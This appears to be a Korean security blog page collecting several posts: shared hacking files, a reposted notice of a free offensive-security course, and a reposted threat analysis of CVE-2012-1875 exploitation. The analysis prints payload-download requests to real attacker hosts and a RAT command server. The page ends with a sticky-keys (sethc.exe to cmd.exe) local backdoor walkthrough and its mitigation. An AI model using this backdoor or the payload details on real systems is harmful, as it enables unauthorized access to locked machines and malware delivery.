posted by 블르샤이닝 2014. 2. 20. 11:08
728x90

https://drive.google.com/file/d/0B4fxnIet58UxbHpfZk9zNmtBR1k/edit?usp=sharing


말그대로 


퍼온곳은 : http://zer0day.tistory.com/66



728x90

'그외 해킹기술' 카테고리의 다른 글

구글 크롬 패스워드 크랙방법이라네요  (0) 2014.07.30
WRP 무력화  (0) 2014.07.11
Free Offensive Security Class  (0) 2013.07.17
WhoisAutoit 빠르게 확인하는법  (0) 2013.07.12
Ongoing attacks exploiting CVE-2012-1875  (0) 2012.06.14
posted by 블르샤이닝 2013. 7. 17. 10:26
728x90
https://www.novainfosec.com/2013/07/16/free-offensive-security-class/



Free Offensive Security Class

July 16, 2013
By 

Post to Twitter Post to Facebook Post to Reddit

This past spring Prof. Xiuwen Liu and W. Owen Redwood taught the first of their Offensive Security classes at Florida State University. Courses like this are nothing new but the difference here is that they put the entire thing online … syllabus, videos, slides, assignments and all.

Included are 15 weeks of very technical content (about 20 actual 1 hour lectures and/or associated slides). Beyond the two books recommended in the syllabus (“Counter Hack Reloaded” by Ed Skoudis and Tom Liston and “Hacking: The Art of Exploitation, 2nd Edition” by Jon Erickson) the entire class is free.

I didn’t have a chance to go through the complete course but did spot check a few of the videos. Audio and video were of good quality and easy to follow. They plan on evolving this course over time each spring so expect content to improve from year to year. Also one thing to note … this class is not related to Offensive Security, the organization that maintains Backtrack and Kali Linux.

To wet your palate of what to expect here’s an embedded video of their Metasploit lecture as well as a quick overview of the topics covered each week.

  • Week 1 Intro/Overview: Intro, Ethics, & Overview; Linux Overview
  • Week 2 Overview/Code Auditing: Windows Overview; Rootkits; Code Auditing
  • Week 3 Reverse Engineering Workshop Week: x86 Reverse engineering
  • Week 4 Exploit Dev: Fuzzing/Exploit Dev 101; Shellcode/Exploit Dev 102
  • Week 5 Exploit Dev / Networking: Exploit Dev 103 (SEH Exploitation, Heap Sprays, and Executable Security Mechanisms); Networking 101 (Data Layer, Link Layer, and IP layer)
  • Week 6 Networking / Web App Hacking: Networking 102 (TCP layer, Important Protocols, Services, Portscanning, ARP); Web App Hacking 101
  • Week 7 Web App Hacking: Web App Hacking 102 (SQLi, XSS); Web App Hacking 103 (SSL attacks, adv techniques)
  • Week 8 Web App Hacking / Exploit Dev: Web App Hacking 104 & Exploit Dev 104; Midterm review & Exploit Dev 105 (ROP)
  • Week 9 Special Topics: Modern History of Cyber Warfare; Social Engineering
  • Week 10 Metaspl0it: Metasploit & Midterm
  • Week 11 Post Exploitation/Forensics: Meterpreter/Post Exploitation; Volatility/IR
  • Week 12 Physical Security: Lockpicking, USB mischief, & BacNET/SCADA security
  • Week 13 Malware / Student Presentations
  • Weeks 14 & 16: Student Presentations

To find out more on the FSU Offensive Security class, checkout their course site atoffsec.noleptr.com.

#####

Today’s post pic is from FSU.edu. See ya!

728x90
posted by 블르샤이닝 2013. 7. 12. 17:19
728x90

간단히 다음과 같이 특정 url의 정보를 확인할 수 있는 툴!


n****.com도메인은 그냥 예시로 넣은거임 특별한 이유없습니다




WhoisAutoit.zip


728x90
posted by 블르샤이닝 2012. 6. 14. 09:10
728x90

http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/?utm_source=rss

----------------------------------------------------------------------------------------------------

June 13th, 2012 | Posted by jaime.blasco in APT | Attacks | Exploits | IP Reputation | Malware

Yesterday, Microsoft released the June 2012 Black Tuesday Update including patches for a vulnerability affecting a wide range versions of Internet Explorer. The exploit works across different Windows versions ranging from XP to Windows 7.

The 0day has been actively exploited as reported by mcafee.

We have been able to find several servers hosting similar versions of the exploit. One of them was detected by our OTX system a couple of days ago:

http://labs.alienvault.com/labs/index.php/projects/open-source-ip-reputation-portal/information-about-ip/?ip=113.10.241.239

The exploit supports a wide range of languages and Windows versions and seems to be very reliable.

 

The exploit includes return-oriented programming (ROP) techniques that helps bypassing OS protections.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

The shellcode downloads the payload from the following url:

GET /javaw.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 113.10.241.239
Connection: Keep-Alive

https://www.virustotal.com/file/705cf0c95f7f0d351d480df4b48f723c7f72ce4e16b14a3a52f99081707e5a32/analysis/

 

 

 

 

 

A couple of days ago the AV detection rate was 3/41.

 

Other versions of the exploit have been found in different servers requesting the following payloads:

GET /english/cala.exe HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 140.109.236.143
Connection: Keep-Alive

and

GET /img/books.cab HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: www.villagXXXX
Connection: Keep-Alive

https://www.virustotal.com/file/1581c0555956f7f62c717e303b6f8785207f107fbb4e375c1e50788d9a4a2f07/analysis/

 

 

 

 

 

 

 

The payloads seems to be RAT (Remote Access Tools).

The C&C server for that RAT is online (ip address 219.90.117.132)

219.90.117.128 – 219.90.117.159
China Shenzhen Soul Tech Co. Ltd

We will release more information as soon as we analyze the components involved on this attack.

728x90
posted by 블르샤이닝 2012. 4. 30. 14:41
728x90

한양대에서 프로젝트로 한 문서인것같다. 구글링에서 나오는거보니...배포할 마음으로 구글링에서 검색되게 한것으로 판단되어 공개합니다


하나는 수집방법에 대한 글, 하나는 타 회사에서 분석한 보고서를 정리한 것 같습니다. 둘다 깔끔하게 정리된것같아 만족합니다>_<


[한양대]_악성코드_수집_및_자동분석_기술_성.pdf


악성코드_내부코드_자동_역공학_분석방법_연.pdf


728x90
posted by 블르샤이닝 2012. 4. 10. 09:59
728x90

이게 아마 예전 어디 사이트에서 받은 소스파일인데....파일정리하다가 봤네;;;그냥 지우기아까우니 ㅋㅋ 소스는 나중에 이용.


아무튼 그런파일인걸로 추정~!




cmd.zip


728x90
posted by 블르샤이닝 2012. 2. 23. 11:20
728x90

아흠~~ 왜 sethc.exe 파일을 뭐하러 쓰나 했떠니 이런 용도군요~ㅋㅋ 

Stickey Local Backdoor

카페에서 내용을 확인하고 테스트 해보기로 했습니다. Coderant님 정보 주셔서 감사합니다. 그리고 본 내용을 보고 Test해
보시는 것은 좋지만, 정말 실행에 옮기시지는 마세요. ㅡ.ㅡ;; 저에게는 법적 책임은 없습니다. 전 공부를 하기 위해서 테스
트 한 것일 뿐 ㅡ.ㅡ;;

C:\WINDOWS\system32 에 sethc.exe 파일 존재합니다. 이 프로그램은 연속으로 Shift키를 연속으로 5번을 클릭하게
되면 이것을 Stickey 라고 해서 sethc.exe 파일이 실행되게 됩니다. 그래서 Local Backdoor로 이용되고 있다고 합니다.

사용자 삽입 이미지

cmd 창에서 아래와 같은 내용을 입력 합니다. 뭐 이부분은 쉽습니다. 그냥 기존에 sethc.exe파일의 이름을 다른 것으로 바꾸고, cmd.exe파일을 sethc.exe 파일로 이름을 바꾼거 뿐입니다. 

사용자 삽입 이미지

그럼 Shift키를 열라 5번을 때렸을때, cmd.exe가 실행되는지 우선은 테스트 해봅시다. 다다다다닥~~~!!!!!

사용자 삽입 이미지

음 이제 화면을 잠그고 테스트 해보겠습니다. 우선은 아무 것이나 강제로 로그인 시도를 해보니 아래와 같이 나오는 군요.ㅋㅋㅋ 당연히 안되야 정상입니다. 

사용자 삽입 이미지

그럼 이상태에서 Shift키를 열라 때려 볼까요.^^ 어라 정말 되었습니다. 음...쉽게 되는군요..ㅋㅋ 이렇게 테스트가 완료
되었습니다. 간단하게 할 수 있는 방법이지만, 생각 보다 무서운 방법이군요.. 참고만 하세요..

사용자 삽입 이미지


대응책이라고 하기는 뭐하지만 가장 좋은 방법은 안 Stickey를 사용하지 않으면 됩니다. 뭐 언제나 취약점에 가장 좋은
대층책이겠지요..^^;; 능력미달이라 이런 것 밖에 못씁니다.

이번에도 Shift키를 5번을 연타합니다. 바바박~~~~! 아래 그림과 같이 설정 버튼을 클릭합니다.

사용자 삽입 이미지

설정키를 클릭하게 되면 아래와 같이 설정하는 화면이 나오는데 키보드탭에서 설정키 다시 클릭 하면 고정키 설정부분이
나오고 바로가기 사용을 미체크 하시면 됩니다. 이상으로 간단히 정리 완료 하였습니다. 수고하세요.^^

사용자 삽입 이미지
728x90